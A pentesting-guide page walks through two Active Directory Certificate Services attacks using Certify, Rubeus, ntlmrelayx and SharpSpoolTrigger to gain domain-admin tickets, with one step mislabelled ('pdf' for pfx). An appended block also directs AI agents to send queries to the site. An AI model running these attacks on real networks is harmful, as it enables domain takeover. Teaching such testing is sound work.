> For the complete documentation index, see [llms.txt](https://the-pentesting-guide.marmeus.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://the-pentesting-guide.marmeus.com/active-directory/certificates.md). # Certificates ## Introduction Active Directory Certificate Services (AD CS) is a customizable service for issuing and managing digital certificates. These digital certificates can be used for the authentication of computer, user, or device accounts on a network. ## Misconfigured Certificate Templates This configuration allows any domain user to request a certificate for any other domain user and use it for authentication. To check if there is any vulnerable template, you can execute the following command. > :information\_source:If "\\Domain Users" have enrollment rights, it means any domain user may request a certificate from this template. ```bash .\Certify.exe find /vulnerable ``` These are the steps to exploit this vulnerability. 1\. Request a certificate for a user with high privileges on the domain, then save the private key and certificate into a file like `cert.pem`. ```bash .\Certify.exe request /ca: /template: /altname: ``` 2\. Convert the `cert.pem` into pdf format. ```bash openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx ``` 3\. Base64 encode the certificate to use it with Rubeus. ```bash cat cert.pfx | base64 -w 0 ``` 4\. Request a TGT using the encoded certificate. ```bash .\Rubeus.exe asktgt /user:Administrator /nowrap /password: /certificate: ``` ## NTLM Relaying to ADCS HTTP Endpoints Useful for when you have the **CA running on a web service** and **authentication via NTLM**. In this case you can force a DC to authenticate to an attacker's machine and then use it to obtain a TGT. AD CS services support HTTP enrolment methods and even includes a GUI. This endpoint is usually found at `http[s]:///certsrv` > You **cannot** relay NTLM authentication back to the originating machine. We therefore wouldn't be able to **relay a DC to a CA if those services were running on the same machine**. > > Another good way to abuse this primitive is by gaining access to a machine configured for unconstrained delegation. These are the steps to exploit this vulnerability. 1\. Execute ntlmrelayx pointing to the web CA on the attacker machine. ```bash sudo proxychains ntlmrelayx.py -t https:///certsrv/certfnsh.asp -smb2support --adcs --no-http-server ``` 2\. Force the DC to authenticate against the attacker machine. The certificate will appear on the ntlmrelayx tool. > You can use any of the programs on [Unconstrained Delegation](/active-directory/kerberos.md#unconstrained-delegation). ```bash .\SharpSpoolTrigger.exe ``` 3\. Use the S4U2Self to obtain the TGT. ```bash .\Rubeus.exe asktgt /user:$ /ptt /certificate: ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://the-pentesting-guide.marmeus.com/active-directory/certificates.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.